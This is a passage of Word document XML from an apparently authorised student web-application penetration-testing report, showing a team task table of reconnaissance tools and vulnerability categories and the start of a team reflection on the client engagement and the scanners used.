            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ED2622C" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="0066332B" w:rsidP="00C611AC">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A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>Manual Testing:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="384C1BC8" w14:textId="136E4BE0" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="0066332B" w:rsidP="00C611AC">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lastRenderedPageBreak/>
              <w:t>Authentication</w:t>
            </w:r>
            <w:r w:rsidR="005412D4">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> Brute-force</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AFE1F28" w14:textId="77777777" w:rsidR="00FD494B" w:rsidRPr="00A81A92" w:rsidRDefault="0066332B" w:rsidP="00C611AC">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Insufficient Logging &amp; Monitoring</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="645E15FE" w14:textId="111CDDA7" w:rsidR="008F7965" w:rsidRPr="00A81A92" w:rsidRDefault="008F7965" w:rsidP="00C611AC">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HSTS Missing </w:t>
            </w:r>
            <w:r w:rsidR="00664A31">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:t>f</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:t>rom HTTPS Server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48B6EB07" w14:textId="2C9553AE" w:rsidR="00FD494B" w:rsidRPr="00A81A92" w:rsidRDefault="00EE2CC7" w:rsidP="00C611AC">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Using Components with Known Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD494B" w14:paraId="7AAFCCA6" w14:textId="77777777" w:rsidTr="00B42B86">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1955" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="7A690FBD" w14:textId="77777777" w:rsidR="00FD494B" w:rsidRPr="00A81A92" w:rsidRDefault="00FD494B" w:rsidP="00C611AC">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="298D5CA8" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00F36B39" w:rsidP="00C611AC">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A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>Proof-of-Concept &amp; Post Exploitation:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B8DD1A1" w14:textId="69005A6F" w:rsidR="00FD494B" w:rsidRPr="00A81A92" w:rsidRDefault="00F36B39" w:rsidP="00C611AC">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Broken Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00290A0B" w14:paraId="45E3F210" w14:textId="77777777" w:rsidTr="00B4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val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w14:paraId="600AB8ED" w14:textId="54378406" w:rsidR="00290A0B" w:rsidRPr="00A81A92" w:rsidRDefault="00290A0B" w:rsidP="00E079B1">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:t>Tan Yi Qian</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68FC2D58" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00B02E28" w:rsidP="00C611AC">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A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>Network Resources:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="166543BA" w14:textId="06E0612A" w:rsidR="00290A0B" w:rsidRPr="00A81A92" w:rsidRDefault="00B02E28" w:rsidP="00C611A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Whois</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00290A0B" w14:paraId="1B43B388" w14:textId="77777777" w:rsidTr="00B42B86">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1955" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="54CA3231" w14:textId="77777777" w:rsidR="00290A0B" w:rsidRPr="00A81A92" w:rsidRDefault="00290A0B" w:rsidP="00C611AC">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="558FEFA2" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00FD494B" w:rsidP="00C611AC">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A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>Internet/WWW:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BF46E98" w14:textId="6B85AF62" w:rsidR="00290A0B" w:rsidRPr="00A81A92" w:rsidRDefault="00FB5C90" w:rsidP="00C611AC">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Shodan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00290A0B" w14:paraId="356D5DD6" w14:textId="77777777" w:rsidTr="00B4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tcPr>
          <w:p w14:paraId="0F4B3B0E" w14:textId="77777777" w:rsidR="00290A0B" w:rsidRPr="00A81A92" w:rsidRDefault="00290A0B" w:rsidP="00C611AC">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B62DE69" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00B73086" w:rsidP="00C611AC">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A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>Profiling Web Architecture Infrastructure &amp; Technologies used:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4686A768" w14:textId="0F7E88ED" w:rsidR="002303AD" w:rsidRDefault="002303AD" w:rsidP="00C611A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HTTP Methods</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="542548F9" w14:textId="17878F06" w:rsidR="00290A0B" w:rsidRPr="00A81A92" w:rsidRDefault="00B73086" w:rsidP="00C611A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Urlscan.IO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD494B" w14:paraId="0071B0DF" w14:textId="77777777" w:rsidTr="00B42B86">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1955" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="1C6A65F3" w14:textId="77777777" w:rsidR="00FD494B" w:rsidRPr="00A81A92" w:rsidRDefault="00FD494B" w:rsidP="00C611AC">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D0D29AC" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00785E0D" w:rsidP="00C611AC">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A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>Operating System and Services</w:t>
            </w:r>
            <w:r w:rsidR="00235EB3" w:rsidRPr="00A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38D5E2FC" w14:textId="02B88D30" w:rsidR="00FD494B" w:rsidRPr="00A81A92" w:rsidRDefault="00235EB3" w:rsidP="00C611AC">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Server Operating System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD494B" w14:paraId="5B54F265" w14:textId="77777777" w:rsidTr="00B4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tcPr>
          <w:p w14:paraId="249B0DE4" w14:textId="77777777" w:rsidR="00FD494B" w:rsidRPr="00A81A92" w:rsidRDefault="00FD494B" w:rsidP="00C611AC">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68A189BC" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00A82B2D" w:rsidP="00C611AC">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A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>Mapping of Directories &amp; Resources:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B70A41E" w14:textId="0C886BF0" w:rsidR="00FD494B" w:rsidRPr="00A81A92" w:rsidRDefault="00A82B2D" w:rsidP="00C611A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Dirb</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD494B" w14:paraId="51FBC970" w14:textId="77777777" w:rsidTr="00B42B86">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1955" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="64E3E6AE" w14:textId="77777777" w:rsidR="00FD494B" w:rsidRPr="00A81A92" w:rsidRDefault="00FD494B" w:rsidP="00C611AC">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54972533" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00A82B2D" w:rsidP="00C611AC">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A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>Vulnerability Scanning:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="161580D3" w14:textId="19342216" w:rsidR="00EF4B97" w:rsidRPr="001155B3" w:rsidRDefault="00A82B2D" w:rsidP="001155B3">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Nexpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0066332B" w14:paraId="45BB4D6D" w14:textId="77777777" w:rsidTr="00B4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tcPr>
          <w:p w14:paraId="59BA1F83" w14:textId="77777777" w:rsidR="0066332B" w:rsidRPr="00A81A92" w:rsidRDefault="0066332B" w:rsidP="00C611AC">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2824CB14" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="0066332B" w:rsidP="00C611AC">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A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>Manual Testing:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F3068EF" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="0066332B" w:rsidP="00C611A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Directory Listing Enabled</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61F29A75" w14:textId="77777777" w:rsidR="0066332B" w:rsidRDefault="0066332B" w:rsidP="00C611A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81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:t>Application Error Disclosure</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5457C206" w14:textId="6C3F0BD1" w:rsidR="0066332B" w:rsidRPr="00A81A92" w:rsidRDefault="000D7C39" w:rsidP="00C611A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Web Application Cookies Not Marked Secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0066332B" w14:paraId="0B88FD9C" w14:textId="77777777" w:rsidTr="00B42B86">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1955" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="3DF9A7E5" w14:textId="77777777" w:rsidR="0066332B" w:rsidRPr="00A81A92" w:rsidRDefault="0066332B" w:rsidP="00C611AC">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D59E07C" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00E12096" w:rsidP="00C611AC">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A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Proof-of-Concept </w:t>
            </w:r>
            <w:r w:rsidR="00F36B39" w:rsidRPr="00A81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>&amp; Post Exploitation:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D03A5EE" w14:textId="77777777" w:rsidR="00D53A54" w:rsidRPr="00A81A92" w:rsidRDefault="00F36B39" w:rsidP="00C611AC">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Website Defacement (XSS)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DAAC65F" w14:textId="4DE749B6" w:rsidR="0066332B" w:rsidRPr="00A81A92" w:rsidRDefault="00F36B39" w:rsidP="00C611AC">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81A92">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:t>Unrestricted File Upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D4BFA97" w14:textId="77777777" w:rsidR="00B75964" w:rsidRPr="00B75964" w:rsidRDefault="00B75964" w:rsidP="00B75964"/>
    <w:p w14:paraId="0FD629BF" w14:textId="260C31B8" w:rsidR="00575C4E" w:rsidRDefault="00575C4E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E15AA04" w14:textId="00938E32" w:rsidR="009008DA" w:rsidRPr="009008DA" w:rsidRDefault="00B970DD" w:rsidP="009008DA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="171" w:name="_Toc93487317"/>
      <w:bookmarkStart w:id="172" w:name="_Toc93502896"/>
      <w:bookmarkStart w:id="173" w:name="_Toc93526932"/>
      <w:bookmarkStart w:id="174" w:name="_Toc94100263"/>
      <w:r w:rsidRPr="008168A7">
        <w:lastRenderedPageBreak/>
        <w:t>Team Reflection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="171"/>
      <w:bookmarkEnd w:id="172"/>
      <w:bookmarkEnd w:id="173"/>
      <w:bookmarkEnd w:id="174"/>
    </w:p>
    <w:p w14:paraId="353105C5" w14:textId="206F03A0" w:rsidR="00A303FE" w:rsidRDefault="00A303FE" w:rsidP="00A303FE">
      <w:r>
        <w:t xml:space="preserve">Through this Web Application Pen-Testing (WAPT) assignment, Team FTK members all gained invaluable experiences, techniques, and insights into industrial level penetration-testing on a web application. Although the Tri-Niche HRCMS web application was </w:t>
      </w:r>
      <w:r w:rsidR="00D3117E">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0085611E">
        <w:t>complete</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> project with </w:t>
      </w:r>
      <w:r w:rsidR="0085611E">
        <w:t>some</w:t>
      </w:r>
      <w:r w:rsidR="00A97326">
        <w:t xml:space="preserve"> of its</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> features and functions neither completed nor configured</w:t>
      </w:r>
      <w:r w:rsidR="00A97326">
        <w:t>, it was still an ex</w:t>
      </w:r>
      <w:r>
        <w:t>cit</w:t>
      </w:r>
      <w:r w:rsidR="00A97326">
        <w:t xml:space="preserve">ing project </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">of vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="00002DC3">
        <w:t>hunting</w:t>
      </w:r>
      <w:r w:rsidR="00C974A2">
        <w:t xml:space="preserve"> and exploitation</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B713B5" w14:textId="4E7F05CC" w:rsidR="00A303FE" w:rsidRDefault="00B01864" w:rsidP="00A303FE">
      <w:r>
        <w:t>Furthermore</w:t>
      </w:r>
      <w:r w:rsidR="00A303FE">
        <w:t xml:space="preserve">, being tasked to </w:t>
      </w:r>
      <w:r w:rsidR="00054616">
        <w:t>engage</w:t>
      </w:r>
      <w:r w:rsidR="00A303FE">
        <w:t xml:space="preserve"> the client, Mr. Erwin Tri</w:t>
      </w:r>
      <w:r w:rsidR="00062D09">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00A303FE">
        <w:t xml:space="preserve"> Sanjaya, </w:t>
      </w:r>
      <w:r w:rsidR="006373E2">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00A303FE">
        <w:t xml:space="preserve">perform penetration testing on the web application, hrcms-admin.tri-niche.com, allowed the team to have a better understanding of the practical concepts taught </w:t>
      </w:r>
      <w:r w:rsidR="00ED3448">
        <w:t xml:space="preserve">during </w:t>
      </w:r>
      <w:r w:rsidR="00131B23">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00A303FE">
        <w:t>Web Application Pen-Testing (WAPT) lessons</w:t>
      </w:r>
      <w:r w:rsidR="002A4E43">
        <w:t>. Some examples are the</w:t>
      </w:r>
      <w:r w:rsidR="00A303FE">
        <w:t xml:space="preserve"> u</w:t>
      </w:r>
      <w:r w:rsidR="002A4E43">
        <w:t>sage</w:t>
      </w:r>
      <w:r w:rsidR="00A303FE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A4E43">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="00A303FE">
        <w:t>different automated tools for scanning the web application</w:t>
      </w:r>
      <w:r w:rsidR="00E700E6">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00BB743B">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="005000BA">
        <w:t>concept of</w:t>
      </w:r>
      <w:r w:rsidR="00A303FE">
        <w:t xml:space="preserve"> each vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="00E700E6">
        <w:t xml:space="preserve">discovered, </w:t>
      </w:r>
      <w:r w:rsidR="00A303FE">
        <w:t>and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7BE8FB" w14:textId="3E606881" w:rsidR="00A303FE" w:rsidRDefault="00A303FE" w:rsidP="00A303FE">
      <w:r>
        <w:t xml:space="preserve">After the chosen client and </w:t>
      </w:r>
      <w:r w:rsidR="00663ACC">
        <w:t>web application</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008811A5">
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> confirmed, the team decided to contact the client </w:t>
      </w:r>
      <w:r w:rsidR="7D97DD67">
        <w:t>at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> an early date to have a longer runway to begin the Testing Phase of the web application in accordance with the module’s testing methodology. The team contacted the client, Mr. Erwin Tri</w:t>
      </w:r>
      <w:r w:rsidR="00062D09">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00876876">
        <w:t>Sanjaya</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> through the working email provided to introduce the team</w:t>
      </w:r>
      <w:r w:rsidR="00240500">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009774EA">
        <w:t>The email also</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007336A9">
        <w:t>enquired</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="523F8389">
        <w:t>about</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> any queries the team had, and the rundown of the project’s timeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A5EA69" w14:textId="2082013B" w:rsidR="00A303FE" w:rsidRDefault="00A303FE" w:rsidP="00A303FE">
      <w:r>
        <w:t>Mr. Erwin was quick to reply to the email which allowed the team to proceed with the Pre-Testing Phase with haste</w:t>
      </w:r>
      <w:r w:rsidR="00E02607">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008811A5">
        <w:t>create</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the Scope, Rules of Engagement document, </w:t>
      </w:r>
      <w:r w:rsidR="00CC1814">
        <w:t>non</w:t>
      </w:r>
      <w:r w:rsidR="00FC09B2">
        <w:t>-Disclosure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> document</w:t>
      </w:r>
      <w:r w:rsidR="008811A5">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and the</w:t>
      </w:r>
      <w:r w:rsidR="00B113E7">
        <w:t xml:space="preserve"> Agreement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Contract. The team looked through the sample documents provided as a benchmark in terms of the level of detail to fit the client’s needs. Being able to complete and submit the 4 documents early creates </w:t>
      </w:r>
      <w:r w:rsidR="00CA2045">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t>huge progression which help</w:t>
      </w:r>
      <w:r w:rsidR="009C57CC">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to boost the team’s morale for the Testing Phase of the assignment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521E701F" w14:textId="0C5793CF" w:rsidR="00A303FE" w:rsidRDefault="00A303FE" w:rsidP="00A303FE">
      <w:r>
        <w:t>During the Testing Phase of the project, the various automated tools available such as Nessus, Nexpose, SkipFish, Wapiti</w:t>
      </w:r>
      <w:r w:rsidR="00AE1386">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and XSSniper were used to </w:t>
      </w:r>
      <w:r w:rsidR="00D91909">
        <w:t xml:space="preserve">efficiently </w:t>
      </w:r>
      <w:r>
        <w:t>gather substantial context and informative information about the web application</w:t>
      </w:r>
      <w:r w:rsidR="00FC38CB">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00294696">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C1440C">
        <w:t>This</w:t>
      </w:r>
      <w:r w:rsidR="00ED2C25">
        <w:t xml:space="preserve"> information </w:t>
      </w:r>
      <w:r w:rsidR="00A80726">
        <w:t>includes</w:t>
      </w:r>
      <w:r w:rsidR="00784FA2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A4233">
        <w:t xml:space="preserve">vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidR="00644B62">
        <w:t>such as Cross-Site Scripting</w:t>
      </w:r>
      <w:r w:rsidR="00ED2C25">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D2756A">
        <w:t xml:space="preserve">that might exist in the web application. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">However, the information in the generated report from these tools did not provide a lot of insights </w:t>
      </w:r>
      <w:r w:rsidR="406A0A3F">
        <w:t>into</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the vulnerabilit</w:t>
      </w:r>
      <w:r w:rsidR="00F10F94">
        <w:t>ies</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or exploit</w:t>
      </w:r>
      <w:r w:rsidR="00F10F94">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which the team can explore. Given that the reports generated </w:t>
      </w:r>
      <w:r w:rsidR="002B5A00">
        <w:t xml:space="preserve">by the </w:t>
      </w:r>
      <w:r w:rsidR="00D0074D">
        <w:t>tool</w:t>
      </w:r>
      <w:r w:rsidR="00080784">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="002B5A00">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B23963">
        <w:t xml:space="preserve">often </w:t>
      </w:r>
      <w:r w:rsidR="008811A5">
        <w:t>show</w:t>
      </w:r>
      <w:r w:rsidR="002B5A00">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00530A11">
        <w:t xml:space="preserve">false </w:t>
      </w:r>
      <w:r w:rsidR="00E64903">
        <w:t>positive</w:t>
      </w:r>
      <w:r w:rsidR="00BE79F4">
        <w:t xml:space="preserve"> results</w:t>
      </w:r>
      <w:r w:rsidR="00422493">
        <w:t xml:space="preserve"> due to </w:t>
      </w:r>
      <w:r w:rsidR="00833519">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00422493">
        <w:t>requests being blocked</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the team </w:t>
      </w:r>
      <w:r w:rsidR="00A448E7">
        <w:t>proceeded</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with manual vulnerability testing on the </w:t>
      </w:r>
      <w:r w:rsidR="00A76E76">
        <w:t>web application</w:t>
      </w:r>
      <w:r w:rsidR="006D3D2A">
        <w:t xml:space="preserve"> to verify the </w:t>
      </w:r>
      <w:r w:rsidR="00067A59">
        <w:t>results of the report</w:t>
      </w:r>
      <w:r w:rsidR="006B5AFE">
        <w:t xml:space="preserve"> and discover other vulnerabilities which the scanners might have missed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The plus side of </w:t>
      </w:r>
      <w:r w:rsidR="00EB53C8">
        <w:t>manually</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> looking for the vulnerabilities </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">or possible indicators </w:t>
      </w:r>
      <w:r w:rsidR="00114C44">
        <w:t>lets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the team actively explore the site’s structural content and design</w:t>
      </w:r>
      <w:r w:rsidR="003C478B">
